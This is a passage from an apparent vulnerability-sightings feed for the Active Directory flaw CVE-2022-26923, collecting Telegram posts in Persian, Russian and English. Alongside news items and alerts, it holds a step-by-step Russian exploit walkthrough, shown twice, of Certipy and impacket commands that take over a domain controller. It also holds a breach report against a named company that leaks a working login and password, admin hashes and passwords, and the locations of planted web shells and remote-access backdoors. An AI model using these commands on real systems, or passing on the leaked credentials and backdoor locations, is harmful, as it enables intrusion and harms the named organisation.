\u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc \u0648 \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0622\u0645\u0631\u06cc\u06a9\u0627 \u06cc\u0627 \u0647\u0645\u0627\u0646 \u0633\u06cc\u0633\u0627 7 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0627 \u0628\u0647 \u0641\u0647\u0631\u0633\u062a \u0628\u0627\u06af \u0647\u0627\u06cc \u062a\u062d\u062a \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc \u062e\u0648\u062f \u0627\u0641\u0632\u0648\u062f\u0647 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u062c\u062f\u06cc\u062f \u062a\u0648\u0633\u0637 \u0627\u067e\u0644\u060c \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a\u060c \u0627\u0633 \u0627\u0650\u06cc \u067e\u06cc \u0648 \u06af\u0648\u06af\u0644 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\u0647 \u0627\u0646\u062f.\n\n\u0628\u0627 \u0627\u062d\u062a\u0633\u0627\u0628 \u0627\u06cc\u0646 7 \u0645\u0648\u0631\u062f \u062c\u062f\u06cc\u062f\u060c \u0641\u0647\u0631\u0633\u062a \u0628\u0627\u06af \u0647\u0627\u06cc \u0633\u06cc\u0633\u0627 \u062d\u0627\u0644\u0627 \u0634\u0627\u0645\u0644 801 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0622\u0698\u0627\u0646\u0633 \u0647\u0627\u06cc \u0641\u062f\u0631\u0627\u0644 \u0628\u0627\u06cc\u0633\u062a\u06cc \u0637\u0628\u0642 \u062a\u0627\u0631\u06cc\u062e \u0647\u0627\u06cc \u062a\u0639\u06cc\u06cc\u0646 \u0634\u062f\u0647\u060c \u0622\u0646 \u0647\u0627 \u0631\u0627 \u0627\u0635\u0644\u0627\u062d \u06a9\u0646\u0646\u062f. \n\n\u0633\u06cc\u0633\u0627 \u0627\u0632 \u062a\u0645\u0627\u0645\u06cc \u0622\u0698\u0627\u0646\u0633 \u0647\u0627\u06cc \u0641\u062f\u0631\u0627\u0644 \u0648 \u0634\u0631\u06a9\u062a \u0647\u0627\u06cc \u0645\u0631\u0628\u0648\u0637\u0647 \u062e\u0648\u0627\u0633\u062a\u0647\u060c \u062a\u0627 \u062a\u0627\u0631\u06cc\u062e 8 \u0633\u067e\u062a\u0627\u0645\u0628\u0631 2022 \u0627\u06cc\u0646 7 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062c\u062f\u06cc\u062f \u0631\u0627 \u0627\u0635\u0644\u0627\u062d \u06a9\u0646\u0646\u062f:\n\nCVE-2017-15944: \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0634\u0631\u06a9\u062a \u067e\u0627\u0644\u0648 \u0622\u0644\u062a\u0648\nCVE-2022-21971: \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a\nCVE-2022-26923: \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a\nCVE-2022-2856: \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u06af\u0648\u06af\u0644\nCVE-2022-32893: \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0627\u067e\u0644\nCVE-2022-32894: \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0627\u067e\u0644\nCVE-2022-22536: \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0634\u0631\u06a9\u062a SAP\n\u0647\u0646\u0648\u0632 \u0647\u06cc\u0686 \u062c\u0632\u0626\u06cc\u0627\u062a\u06cc \u062f\u0631 \u0627\u0631\u062a\u0628\u0627\u0637 \u0628\u0627 \u0646\u062d\u0648\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0628\u0627\u0632\u06cc\u06af\u0631\u0627\u0646 \u0645\u062e\u0631\u0628 \u0627\u0632 \u0622\u0646 \u0647\u0627 \u0645\u0646\u062a\u0634\u0631 \u0646\u0634\u062f\u0647 \u0627\u0633\u062a. \n\n#\u0622\u0633\u06cc\u0628_\u067e\u0630\u06cc\u0631\u06cc\n\n@cyberbannews_ir", "creation_timestamp": "2022-08-20T10:09:16.000000Z"}, {"uuid": "fb6acf5c-1699-4e83-8063-3ff12732ba72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/CherepawwkaChannel/228", "content": "Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\ud83d\uddbc\ufe0f\n\n\u041a\u0440\u0430\u0442\u043a\u043e \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e\u0431 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u043c \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435.\n\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f:\n1. \u0414\u043e\u043c\u0435\u043d\u043d\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c;\n2. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u0432 \u0434\u043e\u043c\u0435\u043d;\n3. \u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0433\u043e \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430 Machine;\n4. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u044c \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u044b \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0431\u0443\u0434\u0435\u0442 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d, \u0442\u0430\u043a \u043a\u0430\u043a \u043c\u044b \u0431\u0443\u0434\u0435\u043c \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0435\u043c \u043e\u0431\u044a\u0435\u043a\u0442\u0430).\n\n\ud83d\udc0d \u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 Certipy, \u043a\u0440\u0430\u0442\u043a\u0430\u044f \u0441\u043f\u0440\u0430\u0432\u043a\u0430 \u043f\u043e \u043d\u0435\u0439 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430 \u043d\u0438\u0436\u0435:\n# \u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430\npip install certipy-ad\n\n# \u0417\u0430\u043f\u0440\u043e\u0441 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430\n# \u0434\u043b\u044f certipy-ad v3.0.0:\ncertipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName\n# \u0434\u043b\u044f certipy-ad v4.8.2:\ncertipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10\n\n# \u0410\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044f \u0441 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f NTLM-\u0445\u044d\u0448\u0430:\ncertipy auth -pfx username.pfx -dc-ip 10.10.10.10\n\u041d\u0430\u0447\u043d\u0435\u043c \u0430\u0442\u0430\u043a\u0443 \u0441 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 Impacket-Addcomputer\naddcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'\n\u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u0434\u043b\u044f \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0448\u0430\u0431\u043b\u043e\u043d Machine) \u0438 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0443\u0435\u043c\u0441\u044f \u0441 \u043d\u0438\u043c:\ncertipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine\n\ncertipy auth -pfx testpc.pfx\n\u0414\u0430\u043b\u0435\u0435 \u0437\u0430\u0445\u043e\u0434\u0438\u043c \u043d\u0430 \u043b\u044e\u0431\u043e\u0439 \u0445\u043e\u0441\u0442 \u0434\u043e\u043c\u0435\u043d\u0430 \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u043c \u043c\u0435\u043d\u044f\u0442\u044c SPN \u0443 \u0437\u0430\u043f\u0438\u0441\u0438 \u043d\u0430\u0448\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430:\nGet-ADComputer TESTPC -properties dnshostname,serviceprincipalname\nSet-ADComputer TESTPC -DnsHostName DC.domain.local # \u0432\u0435\u0440\u043d\u0451\u0442 \u043e\u0448\u0438\u0431\u043a\u0443 \u0438\u0437-\u0437\u0430 \u0434\u0443\u0431\u043b\u0438\u0440\u0443\u044e\u0449\u0435\u0439\u0441\u044f SPN\nSet-ADComputer TESTPC -ServicePrincipalName @{} # \u043e\u0431\u043d\u0443\u043b\u044f\u0435\u043c SPN\nSet-ADComputer TESTPC -DnsHostName DC.domain.local\n\u0412\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u043c\u0441\u044f \u043d\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u0445\u043e\u0441\u0442 \u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u043d\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442:\ncertipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine\n\u0410\u0432\u0442\u043e\u0440\u0438\u0437\u0443\u0435\u043c\u0441\u044f \u0441 \u043f\u043e\u043b\u0447\u0435\u043d\u043d\u044b\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c NTLM \u0445\u044d\u0448 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430:\ncertipy auth -pfx dc.pfx\n...\n[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733\n\u0414\u0430\u043b\u0435\u0435 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c \u0430\u0442\u0430\u043a\u0443 DCSync \u043b\u044e\u0431\u044b\u043c \u0443\u0434\u043e\u0431\u043d\u044b\u043c \u0434\u043b\u044f \u043d\u0430\u0441 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u043c \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u043c \u0434\u043e\u043c\u0435\u043d:\nsecretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt\n\u0412\u0435\u043a\u0442\u043e\u0440 \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u043a CVE-2022-26923 \u0441\u0440\u0435\u0434\u0435 Active Directory, \u043d\u043e \u0435\u0441\u043b\u0438 \u0432\u044b \u0432 \u043d\u0435\u0439 \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c, \u0442\u043e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0431\u0443\u0434\u0435\u0442 \u0442\u0430\u043a \u0436\u0435 \u043f\u0440\u043e\u0441\u0442\u043e, \u043a\u0430\u043a, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0435\u0439 ZeroLogon!\ud83d\udd3a\n#\u043f\u0435\u043d\u0442\u0435\u0441\u0442 #AD", "creation_timestamp": "2023-12-19T10:32:37.000000Z"}, {"uuid": "c08f4d76-6ff9-4b20-b4f0-6322d62d53bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "exploited", "source": "https://t.me/snatch_info/129", "content": "CyberSnatch, part 1\n\ud83c\udfafReport on the search for vulnerabilities in the local network of ixperta.com, further called \u201ccompany\u201d\n\nInformation:\u00a0\nSlovakia,\u00a0Consumer\u00a0Services\nRevenue:\u00a0$63\u00a0Million\u00a0\nhttps://www.zoominfo.com/c/ixperta-company/369154620\u00a0\nPhone\u00a0Number:\u00a0\n+421\u00a02/322\u00a0927\u00a011\u00a0\nWebsite:\u00a0\nwww.ixperta.com\u00a0\n\u00a0\n\u265fWe found the company's domain on the Internet. By enumerating sub-domains, we found a VPN access point with an address vpn1.ixperta.com. It was a VPN router from Cisco. After conducting reconnaissance of the company in the open network, we were able to find the mailing addresses of their employees. Removed the domain from the address and got a valid login for the Active directory service. By spraying passwords on the logins we found, we gained access to this account \n\nlogin:\u00a0tomas.daniel\u00a0\npassword:\u00a0#JohnvonNeumann7800\u00a0\n\n\ud83c\udfb3 The company uses default settings in the remote VPN access point, and any user from the \"domain users\" group has the right to connect to the VPN point, in addition, no user is in the DMZ zone and by default sees all machines and all open ports on the network.\n\n\ud83c\udfb0 Having found the primary domain controller at the address 172.16.55.100 with the name brndc02.ixperta.local (with the help of the same user tomas.daniel), we completely polled the LDAP server and received all the information about the domain and its objects. \n\nNext step we requested information about the certification authority located at 10.10.10.2 PRGDC01.ixperta.local.\nThe server turned out to be vulnerable to CVE-2022-26923, and having received a certificate with elevated privileges, and we obtained a copy of the ntds database using impacket\nsecretsdump 'ixperta.local/administrator@PRGDC01.ixperta.local' - hashes :a1qw5e8d11e619a41b38fbb938yiy6fb\nWe managed to hack 3 domain administrators account passwords from that database. Got hash for 'administrator@ixperta.local': aad3b435b51404eeaad3b435b51404ee:hidden \u2013 R@mm$te1n\nGot hash for 'a_nikodem@ixperta.local': aad3b435b51404eeaad3b435b51404ee:hidden \u2013 R@mm$te1n\nGot hash for 'a_admin@ixperta.local': aad3b435b51404eeaad3b435b51404ee:hidden - Duben2021 First of all we began to gain a foothold in the system, we hung the first backdoor on their exchange server and web shells were installed at the following addresses https://owa.ixperta.com/owa/auth/exchangeServerErrorSvc.aspx.aspx https://owa.ixperta.com/owa/auth/forgotpassword2.aspx.aspx\n\nOn server 10.20.10.22: brnex03.ixperta.local Cobalt beacon was thrown. At the end we installed hidden AnyDesk on brqb084a.ixperta.local and Money3s.ixperta.local servers.", "creation_timestamp": "2023-08-18T11:00:39.000000Z"}, {"uuid": "3a2f9cc0-7815-4754-920e-8ebc360670ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "exploited", "source": "Telegram/PTHKQ06bP3q6apx3Krv4L2iJCBBovWGsPYlkQuufLnbVvmI", "content": "", "creation_timestamp": "2025-03-04T16:00:08.000000Z"}, {"uuid": "d14d2f78-9474-4099-b78b-adf45abd8cf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/arpsyndicate/1918", "content": "#ExploitObserverAlert\n\nCVE-2022-26923\n\nDESCRIPTION: Exploit Observer has 69 entries related to CVE-2022-26923. Active Directory Domain Services Elevation of Privilege Vulnerability.\n\nFIRST-EPSS: 0.006670000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-18T05:08:25.000000Z"}, {"uuid": "091b2017-e3bb-4866-8b49-dc9f9beb0d08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/arpsyndicate/1171", "content": "#ExploitObserverAlert\n\nCVE-2022-26923\n\nDESCRIPTION: Exploit Observer has 69 entries related to CVE-2022-26923. Active Directory Domain Services Elevation of Privilege Vulnerability.\n\nFIRST-EPSS: 0.006670000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-04T09:46:15.000000Z"}, {"uuid": "3eae56b8-7b7d-4e12-8360-59ed15121127", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/arpsyndicate/766", "content": "#ExploitObserverAlert\n\nCVE-2022-26923\n\nDESCRIPTION: Exploit Observer has 69 entries related to CVE-2022-26923. Active Directory Domain Services Elevation of Privilege Vulnerability.\n\nFIRST-EPSS: 0.005900000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-11-29T16:13:59.000000Z"}, {"uuid": "81b21e3f-f3de-4132-82e7-930f7c1058d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/NarimanGharib/325", "content": "\u0645\u0647\u0627\u062c\u0645 \u0627\u0632 \u06cc\u06a9 \u062d\u0641\u0631\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0647 \u0646\u0627\u0645 CVE-2022-26923 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647 \u06a9\u0647 \u0628\u06cc\u0634 \u0627\u0632 \u0686\u0647\u0627\u0631 \u0645\u0627\u0647 \u067e\u06cc\u0634 \u06a9\u0634\u0641 \u0634\u062f\u0647 \u0628\u0648\u062f \u0648 \u0628\u0631\u0627\u0634 \u0647\u0645\u0648\u0646 \u0645\u0648\u0642\u0639 \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0645 \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0647 \u0628\u0648\u062f. \u0686\u0647\u0627\u0631\u0645\u0627\u0647 \u062f\u0631 \u062f\u0646\u06cc\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a \u0645\u062c\u0627\u0632\u06cc \u06cc\u0639\u0646\u06cc \u06cc\u06a9 \u0642\u0631\u0646. \u0648\u0642\u062a\u06cc \u06a9\u0627\u0631\u0647\u0627 \u0628\u0631 \u0627\u0633\u0627\u0633 \u0631\u0627\u0628\u0637\u0647 \u062a\u0642\u0633\u06cc\u0645 \u0628\u0634\u0646\u060c \u0646\u0642\u0637\u0647 \u0636\u0639\u0641 \u0628\u0632\u0631\u06af\u06cc \u0628\u0648\u062c\u0648\u062f \u0645\u06cc\u0627\u062f \u06a9\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632\u0634 \u0641\u0642\u0637 \u0628\u062d\u062b \u0632\u0645\u0627\u0646\u0647.\nhttps://twitter.com/ayatsubzero/status/1554633303969472512", "creation_timestamp": "2022-08-03T05:03:25.000000Z"}, {"uuid": "688b1f63-e1b6-4214-88f9-0a6056865a52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "seen", "source": "https://t.me/thehackernews/2494", "content": "CISA has updated its Known Exploited Vulnerabilities Catalog with 7 new vulnerabilities based on evidence of active exploitation.\n\nRead details: https://thehackernews.com/2022/08/cisa-adds-7-new-actively-exploited.html\n\nCVE-2017-15944, CVE-2022-21971, CVE-2022-26923, CVE-2022-2856, CVE-2022-32893, CVE-2022-32894, CVE-2022-22536", "creation_timestamp": "2022-08-23T14:49:44.000000Z"}, {"uuid": "1190af0b-c582-4fbd-b2c4-624ab18157c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/HackerOne/3335", "content": "https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4", "creation_timestamp": "2022-05-14T23:19:02.000000Z"}, {"uuid": "c8f9cf71-2fb8-4d4c-a096-3479479c9491", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-26923", "type": "published-proof-of-concept", "source": "https://t.me/S_E_Reborn/4401", "content": "Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\ud83d\uddbc\ufe0f\n\n\u041a\u0440\u0430\u0442\u043a\u043e \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e\u0431 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u043c \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435.\n\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f:\n1. \u0414\u043e\u043c\u0435\u043d\u043d\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c;\n2. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u0432 \u0434\u043e\u043c\u0435\u043d;\n3. \u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0433\u043e \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430 Machine;\n4. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u044c \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u044b \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0431\u0443\u0434\u0435\u0442 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d, \u0442\u0430\u043a \u043a\u0430\u043a \u043c\u044b \u0431\u0443\u0434\u0435\u043c \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0435\u043c \u043e\u0431\u044a\u0435\u043a\u0442\u0430).\n\n\ud83d\udc0d \u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 Certipy, \u043a\u0440\u0430\u0442\u043a\u0430\u044f \u0441\u043f\u0440\u0430\u0432\u043a\u0430 \u043f\u043e \u043d\u0435\u0439 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430 \u043d\u0438\u0436\u0435:\n# \u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430\npip install certipy-ad\n\n# \u0417\u0430\u043f\u0440\u043e\u0441 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430\n# \u0434\u043b\u044f certipy-ad v3.0.0:\ncertipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName\n# \u0434\u043b\u044f certipy-ad v4.8.2:\ncertipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10\n\n# \u0410\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044f \u0441 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f NTLM-\u0445\u044d\u0448\u0430:\ncertipy auth -pfx username.pfx -dc-ip 10.10.10.10\n\u041d\u0430\u0447\u043d\u0435\u043c \u0430\u0442\u0430\u043a\u0443 \u0441 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 Impacket-Addcomputer\naddcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'\n\u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u0434\u043b\u044f \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0448\u0430\u0431\u043b\u043e\u043d Machine) \u0438 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0443\u0435\u043c\u0441\u044f \u0441 \u043d\u0438\u043c:\ncertipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine\n\ncertipy auth -pfx testpc.pfx\n\u0414\u0430\u043b\u0435\u0435 \u0437\u0430\u0445\u043e\u0434\u0438\u043c \u043d\u0430 \u043b\u044e\u0431\u043e\u0439 \u0445\u043e\u0441\u0442 \u0434\u043e\u043c\u0435\u043d\u0430 \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u043c \u043c\u0435\u043d\u044f\u0442\u044c SPN \u0443 \u0437\u0430\u043f\u0438\u0441\u0438 \u043d\u0430\u0448\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430:\nGet-ADComputer TESTPC -properties dnshostname,serviceprincipalname\nSet-ADComputer TESTPC -DnsHostName DC.domain.local # 